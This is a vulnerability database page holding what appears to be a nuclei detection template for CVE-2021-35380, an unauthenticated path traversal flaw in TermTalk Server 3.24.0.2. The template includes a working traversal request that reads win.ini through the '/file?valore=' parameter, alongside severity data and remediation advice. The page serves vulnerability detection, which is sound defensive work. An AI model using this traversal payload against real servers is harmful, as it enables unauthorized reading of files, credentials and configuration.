Lucene search
K

TermTalk Server 3.24.0.2 - Local File Inclusion

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

TermTalk Server 3.24.0.2 - Local File Inclusion vulnerability, allows unauthenticated retrieval of sensitive file

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-35380
15 Feb 202222:15
attackerkb
Circl
CVE-2021-35380
16 Feb 202200:36
circl
CNNVD
Solari Di Udine TermTalk Server 路径遍历漏洞
15 Feb 202200:00
cnnvd
CVE
CVE-2021-35380
15 Feb 202221:17
cve
Cvelist
CVE-2021-35380
15 Feb 202221:17
cvelist
NVD
CVE-2021-35380
15 Feb 202222:15
nvd
OSV
CVE-2021-35380
15 Feb 202222:15
osv
Prion
Directory traversal
15 Feb 202222:15
prion
RedhatCVE
CVE-2021-35380
22 May 202519:53
redhatcve
id: CVE-2021-35380

info:
  name: TermTalk Server 3.24.0.2 - Local File Inclusion
  author: fxploit
  severity: high
  description: |
    TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
  remediation: |
    Apply the latest patch or upgrade to a non-vulnerable version of TermTalk Server.
  reference:
    - https://www.swascan.com/solari-di-udine/
    - https://www.exploit-db.com/exploits/50638
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35380
    - https://www.swascan.com/it/security-blog/
    - https://github.com/anonymous364872/Rapier_Tool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-35380
    cwe-id: CWE-22
    epss-score: 0.38954
    epss-percentile: 0.98411
    cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: solari
    product: termtalk_server
  tags: cve2021,cve,termtalk,lfi,unauth,lfr,edb,solari,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/file?valore=../../../../../windows/win.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4b0a00483046022100e6615b8bfe8de56268289f18bea688583867898e46d3f599e780073a0060eda0022100eea5525a3ed197f7090c9343b63369a7eb776c71c04717d6da1401fd6d589b53:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.38954
27